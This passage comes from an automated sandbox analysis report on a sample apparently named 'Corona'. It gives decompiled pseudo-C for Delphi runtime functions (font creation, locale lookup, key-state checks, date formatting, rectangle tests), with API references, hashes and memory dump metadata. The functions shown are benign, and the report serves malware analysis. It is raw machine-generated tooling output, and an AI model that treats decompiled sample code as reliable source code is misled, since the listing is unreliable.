						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E004040B0( &_v72, _v8 + 0x1b);
						if(E00407AD0(_v72, "Default") != 0) {
							E004040B0( &_v80, _v8 + 0x1b);
							E00408308( &(_v68.lfFaceName), _v80);
						} else {
							E004040B0( &_v76, "\rMS Sans Serif");
							E00408308( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041C724(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41c5a8);
					_t81 =  *0x4528d8; // 0x2130a30
					return E0041B790(_t81);
				}
			}
















                                  0x0041c441
                                  0x0041c443
                                  0x0041c449
                                  0x0041c44c
                                  0x0041c44f
                                  0x0041c452
                                  0x0041c456
                                  0x0041c457
                                  0x0041c45c
                                  0x0041c45f
                                  0x0041c465
                                  0x0041c46f
                                  0x0041c5b3
                                  0x0041c5b6
                                  0x0041c5c8
                                  0x0041c475
                                  0x0041c475
                                  0x0041c47a
                                  0x0041c481
                                  0x0041c482
                                  0x0041c487
                                  0x0041c48a
                                  0x0041c494
                                  0x0041c4a0
                                  0x0041c4a5
                                  0x0041c4aa
                                  0x0041c4af
                                  0x0041c4b9
                                  0x0041c4c4
                                  0x0041c4bb
                                  0x0041c4bb
                                  0x0041c4bb
                                  0x0041c4d5
                                  0x0041c4e2
                                  0x0041c4ef
                                  0x0041c4f8
                                  0x0041c504
                                  0x0041c518
                                  0x0041c53d
                                  0x0041c548
                                  0x0041c51a
                                  0x0041c522
                                  0x0041c52d
                                  0x0041c52d
                                  0x0041c54d
                                  0x0041c551
                                  0x0041c555
                                  0x0041c560
                                  0x0041c562
                                  0x0041c56a
                                  0x0041c564
                                  0x0041c566
                                  0x0041c570
                                  0x0041c568
                                  0x0041c576
                                  0x0041c576
                                  0x0041c566
                                  0x0041c586
                                  0x0041c586
                                  0x0041c58b
                                  0x0041c58e
                                  0x0041c591
                                  0x0041c596
                                  0x0041c5a0
                                  0x0041c5a0

                                  APIs
                                    • Part of subcall function 0041B784: RtlEnterCriticalSection.KERNEL32(?,0041B7C1), ref: 0041B788
                                  • CreateFontIndirectA.GDI32(?), ref: 0041C57E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateCriticalEnterFontIndirectSection
                                  • String ID: MS Sans Serif$Default
                                  • API String ID: 2931345757-2137701257
                                  • Opcode ID: e0fe933b94f0d864d7b1dbacc94c2c03b0a508a8b1366433d5eaa37f6c4b7ecf
                                  • Instruction ID: 4c8d425f2b6d313922405b049071a1ed770be7e81967a9b87c544665316687c2
                                  • Opcode Fuzzy Hash: e0fe933b94f0d864d7b1dbacc94c2c03b0a508a8b1366433d5eaa37f6c4b7ecf
                                  • Instruction Fuzzy Hash: 49516030A44248DFDB01CFA5C981BCEBBF6EF49304F5540AAD404A7352D778AE85CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040AAAC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E0040AAAC(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x40abbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x4526a8;
				_t83 = 0x4526d8;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E0040AA70(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00403EA0(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E0040AA70(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00403EA0(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x452708;
				_t84 = 0x452724;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E0040AA70(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00403EA0(_t87, _v24);
					E0040AA70(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00403EA0(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E0040ABC6);
				return E00403E70( &_v28, 4);
			}

















                                  0x0040aaad
                                  0x0040aab1
                                  0x0040aab2
                                  0x0040aab3
                                  0x0040aab4
                                  0x0040aab5
                                  0x0040aab6
                                  0x0040aabc
                                  0x0040aabd
                                  0x0040aac2
                                  0x0040aac5
                                  0x0040aacd
                                  0x0040aad0
                                  0x0040aad5
                                  0x0040aada
                                  0x0040aadf
                                  0x0040aaee
                                  0x0040aaf2
                                  0x0040aafd
                                  0x0040ab11
                                  0x0040ab15
                                  0x0040ab20
                                  0x0040ab25
                                  0x0040ab26
                                  0x0040ab29
                                  0x0040ab2c
                                  0x0040ab31
                                  0x0040ab36
                                  0x0040ab3b
                                  0x0040ab40
                                  0x0040ab40
                                  0x0040ab48
                                  0x0040ab4b
                                  0x0040ab63
                                  0x0040ab6e
                                  0x0040ab88
                                  0x0040ab93
                                  0x0040ab98
                                  0x0040ab99
                                  0x0040ab9c
                                  0x0040ab9f
                                  0x0040aba6
                                  0x0040aba9
                                  0x0040abac
                                  0x0040abbe

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000000,0040ABBF,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AAC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: LocaleThread
                                  • String ID: Tl@$\k@
                                  • API String ID: 635194068-3608189427
                                  • Opcode ID: 0ac6bc8cb8082e4b21164c5ba209f0cd4bed27ba5fae9a67bf1f1be53a0a0437
                                  • Instruction ID: d2c94959ce0acc71ecf25258568ea482d5beb9c541544cc34f02ee37829f61b7
                                  • Opcode Fuzzy Hash: 0ac6bc8cb8082e4b21164c5ba209f0cd4bed27ba5fae9a67bf1f1be53a0a0437
                                  • Instruction Fuzzy Hash: 8F31A475B006085BDB00DA85C881E6F77AADB89314F51803BEA09E73C1DB3DAD458799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004417E8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004417E8(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x452ba4; // 0x2130da8
					E0042358C(_t34,  &_v24);
					_push(_t69);
					_push(0x4418e6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E004414EC(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x4418ed);
							_t40 =  *0x452ba4; // 0x2130da8
							return E00423584(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x452ba4; // 0x2130da8
					E0042358C(_t42,  &_v8);
					_push(_t69);
					_push(0x4418bb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E00441694( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x4418c2);
					_t48 =  *0x452ba4; // 0x2130da8
					return E00423584(_t48);
				}
				L14:
			}


















                                  0x004417e9
                                  0x004417eb
                                  0x004417ef
                                  0x004417f1
                                  0x004417fb
                                  0x00441804
                                  0x00441903
                                  0x0044180a
                                  0x00441814
                                  0x00441816
                                  0x00441816
                                  0x00441826
                                  0x00441828
                                  0x00441828
                                  0x00441832
                                  0x00441834
                                  0x00441834
                                  0x00441840
                                  0x00441846
                                  0x0044184b
                                  0x00441852
                                  0x00441853
                                  0x00441858
                                  0x0044185b
                                  0x0044185e
                                  0x0044185e
                                  0x00441870
                                  0x00441877
                                  0x00000000
                                  0x00000000
                                  0x004418c6
                                  0x004418d0
                                  0x004418d3
                                  0x004418d6
                                  0x004418db
                                  0x004418e5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004418c6
                                  0x0044187c
                                  0x00441881
                                  0x00441888
                                  0x00441889
                                  0x0044188e
                                  0x00441891
                                  0x004418a0
                                  0x004418a5
                                  0x004418a8
                                  0x004418ab
                                  0x004418b0
                                  0x004418ba
                                  0x004418ba
                                  0x00000000

                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 0044180C
                                  • GetKeyState.USER32(00000011), ref: 0044181E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 6a5531a57f7ee8e905a81f12160bad938abbcf11c77bbac6292ea13374682dca
                                  • Instruction ID: 806afbff69c5c72186e2cefbf9e0794c7fa794c62d13c121146b1b8644e40891
                                  • Opcode Fuzzy Hash: 6a5531a57f7ee8e905a81f12160bad938abbcf11c77bbac6292ea13374682dca
                                  • Instruction Fuzzy Hash: 90310530B04308AFFB15EFA5D94269DB7F5EF48304F5184BAEC04A72A2E77C5A84C658
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044E3BC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0044E3BC(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t52;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __esi;
				_t71 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x44e4cc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t56 = E0044E344(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t52 = _v8;
					_t79 =  *((intOrPtr*)(_t52 + 0x48));
					if( *((intOrPtr*)(_t52 + 0x48)) == 0) {
						E0044E914(_v8);
					}
				}
				E0044C3F4(_t56,  &_v20);
				E0042B958(_v20, 0,  &_v16, _t79);
				_t36 =  *0x452bb0; // 0x2131714
				E0044E57C(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x44e473);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0x102)) != 0) {
					_t56 = _v8;
					 *((intOrPtr*)(_v8 + 0x100))();
				}
				if(_v9 != 0) {
					E0044E2E0();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x451128; // 0x452030
				if(_t41 ==  *_t67 && E00418EF8(0, _t56, _t71, _t72) != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E0044E4D3);
				return E00403E70( &_v20, 2);
			}
















                                  0x0044e3bc
                                  0x0044e3bc
                                  0x0044e3bd
                                  0x0044e3bf
                                  0x0044e3c2
                                  0x0044e3c3
                                  0x0044e3c4
                                  0x0044e3c7
                                  0x0044e3ca
                                  0x0044e3cd
                                  0x0044e3d2
                                  0x0044e3d3
                                  0x0044e3d8
                                  0x0044e3db
                                  0x0044e3e6
                                  0x0044e3f2
                                  0x0044e3f4
                                  0x0044e3f7
                                  0x0044e3fb
                                  0x0044e400
                                  0x0044e400
                                  0x0044e3fb
                                  0x0044e40a
                                  0x0044e415
                                  0x0044e41d
                                  0x0044e422
                                  0x0044e427
                                  0x0044e42d
                                  0x0044e42e
                                  0x0044e433
                                  0x0044e436
                                  0x0044e444
                                  0x0044e449
                                  0x0044e455
                                  0x0044e455
                                  0x0044e45f
                                  0x0044e464
                                  0x0044e464
                                  0x0044e46b
                                  0x0044e46e
                                  0x0044e488
                                  0x0044e48d
                                  0x0044e495
                                  0x0044e4a2
                                  0x0044e4a2
                                  0x0044e4aa
                                  0x0044e4ac
                                  0x0044e4ac
                                  0x0044e4b3
                                  0x0044e4b6
                                  0x0044e4b9
                                  0x0044e4cb

                                  APIs
                                    • Part of subcall function 0044E344: GetCursorPos.USER32 ref: 0044E34D
                                  • GetCurrentThreadId.KERNEL32 ref: 0044E488
                                  • WaitMessage.USER32(00000000,0044E4CC,?,?,?,0044F588), ref: 0044E4AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CurrentCursorMessageThreadWait
                                  • String ID: 0 E
                                  • API String ID: 535285469-1209576767
                                  • Opcode ID: f708ca782a39fb3c66121e6a314cd9b79fb23f62d6c9ba99ce538b5990acd397
                                  • Instruction ID: 16e9aaf56b4cd703d9d399fe4c5cf89c8dc545482637305d53f87ae60206ec12
                                  • Opcode Fuzzy Hash: f708ca782a39fb3c66121e6a314cd9b79fb23f62d6c9ba99ce538b5990acd397
                                  • Instruction Fuzzy Hash: F6319330A04244EFEB11DFA6C846AAEB7F5FB09314F5144BAE80497392D7789E40CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004097CC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E004097CC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x4098aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E4C(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403EE4( &_v8, 0x4098cc);
				} else {
					E00403EE4( &_v8, 0x4098c0);
				}
				_t32 = E0040430C(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040BC(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E0040436C( *_t49, E0040410C( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E004098B1);
				return E00403E4C( &_v8);
			}













                                  0x004097d9
                                  0x004097dc
                                  0x004097de
                                  0x004097e2
                                  0x004097e3
                                  0x004097e8
                                  0x004097eb
                                  0x004097f0
                                  0x004097fc
                                  0x00409807
                                  0x00409812
                                  0x00409819
                                  0x00409832
                                  0x0040981b
                                  0x00409823
                                  0x00409823
                                  0x00409846
                                  0x0040985f
                                  0x0040986e
                                  0x00409874
                                  0x0040988f
                                  0x0040988f
                                  0x00409874
                                  0x00409896
                                  0x00409899
                                  0x0040989c
                                  0x004098a9

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,004098AA), ref: 00409852
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,004098AA), ref: 00409858
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 80921253b8fe827173fbe019159d22fbef38d3292844ab82dbd7b73aeb295454
                                  • Instruction ID: 86b8f1c99eb2c2116ed8d91da2cdce5be980b1c5e5238f581ede5124ef2b1d94
                                  • Opcode Fuzzy Hash: 80921253b8fe827173fbe019159d22fbef38d3292844ab82dbd7b73aeb295454
                                  • Instruction Fuzzy Hash: BA2174756106089BDB04FFA5C842AAEB7A8EF49700F50407BF904F73D2E6389E00CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042EBA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042EBA0(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00413754( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E004136F8(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0042E194(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                  0x0042eba9
                                  0x0042ebb6
                                  0x0042ebc9
                                  0x0042ebcd
                                  0x0042ec1d
                                  0x0042ec1d
                                  0x0042ebcf
                                  0x0042ebcf
                                  0x0042ebcf
                                  0x0042ebd9
                                  0x0042ebdf
                                  0x00000000
                                  0x0042ebe7
                                  0x0042ebec
                                  0x0042ec00
                                  0x0042ec17
                                  0x00000000
                                  0x00000000
                                  0x0042ec17
                                  0x00000000
                                  0x0042ec19
                                  0x0042ec19
                                  0x00000000
                                  0x0042ebcf
                                  0x0042ec21
                                  0x0042ec2a

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: a9d5b4b8b104d74fda9fd87ce42a1811ab5083883410deb39bdc9c0d80e5de11
                                  • Instruction ID: 8a37059bed2244c262caaec57298d58cde423208b6fee6a9048858e295006f5e
                                  • Opcode Fuzzy Hash: a9d5b4b8b104d74fda9fd87ce42a1811ab5083883410deb39bdc9c0d80e5de11
                                  • Instruction Fuzzy Hash: 2C1191316042585BC711DAAEC885BDF7BE89F49318F4401A2FD14EB382D779DD458794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00444C18, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E00444C18(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr _t23;
				char _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t30;
				void* _t31;
				intOrPtr _t32;

				_t30 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v8 = 0;
				_t23 =  *0x450c28; // 0x0
				_v12 = _t23;
				_t24 =  *0x450c34; // 0x0
				_v16 = _t24;
				 *0x450c28 = __eax;
				 *0x450c34 = 0;
				_push(_t30);
				_push(0x444cbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(_t30);
				_push(0x444c84);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				_push(0);
				_push(E00444BC8);
				_push(GetCurrentThreadId());
				L0040631C();
				_t12 =  *0x450c34; // 0x0
				_v8 = _t12;
				_pop(_t25);
				 *[fs:eax] = _t25;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x444cc2);
				_t5 =  &_v16; // 0x426326
				 *0x450c34 =  *_t5;
				_t16 = _v12;
				 *0x450c28 = _t16;
				return _t16;
			}















                                  0x00444c19
                                  0x00444c1b
                                  0x00444c23
                                  0x00444c26
                                  0x00444c2c
                                  0x00444c2f
                                  0x00444c35
                                  0x00444c38
                                  0x00444c3f
                                  0x00444c46
                                  0x00444c47
                                  0x00444c4c
                                  0x00444c4f
                                  0x00444c54
                                  0x00444c55
                                  0x00444c5a
                                  0x00444c5d
                                  0x00444c60
                                  0x00444c62
                                  0x00444c6c
                                  0x00444c6d
                                  0x00444c72
                                  0x00444c77
                                  0x00444c7c
                                  0x00444c7f
                                  0x00444c9f
                                  0x00444ca2
                                  0x00444ca5
                                  0x00444caa
                                  0x00444cad
                                  0x00444cb2
                                  0x00444cb5
                                  0x00444cba

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00444C67
                                  • 72E7AC10.USER32(00000000,00444BC8,00000000,00000000,00444C84,?,00000000,00444CBB), ref: 00444C6D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID: &cB
                                  • API String ID: 2882836952-360971160
                                  • Opcode ID: a8365d4aa2942b7d6c48a2423b6ea83f1e7f4383444b6600445e93edfbceb091
                                  • Instruction ID: 3539899deace6a83325ef71540ee0ce8bd946b4c2d996801c4c2af5f19837a2d
                                  • Opcode Fuzzy Hash: a8365d4aa2942b7d6c48a2423b6ea83f1e7f4383444b6600445e93edfbceb091
                                  • Instruction Fuzzy Hash: C4019674A16704AFE316CF65DC91A5EBBF8E78E7207228576E804D3751EA349910CA1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00423A14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 68%
                                  			E00423A14(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x452923 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x452904; // 0x423a14
					 *0x452904 = E0042377C(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x452904(_a4, _a8, _t19);
				}
				return _t16;
			}













                                  0x00423a1a
                                  0x00423a24
                                  0x00423a4e
                                  0x00423a57
                                  0x00423a7f
                                  0x00423a7f
                                  0x00423a59
                                  0x00423a59
                                  0x00423a5e
                                  0x00000000
                                  0x00000000
                                  0x00423a5e
                                  0x00423a26
                                  0x00423a2b
                                  0x00423a38
                                  0x00423a4a
                                  0x00423a4a
                                  0x00423a8a

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00423A62
                                  • GetSystemMetrics.USER32 ref: 00423A74
                                    • Part of subcall function 0042377C: GetProcAddress.KERNEL32(745C0000,00000000), ref: 004237FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
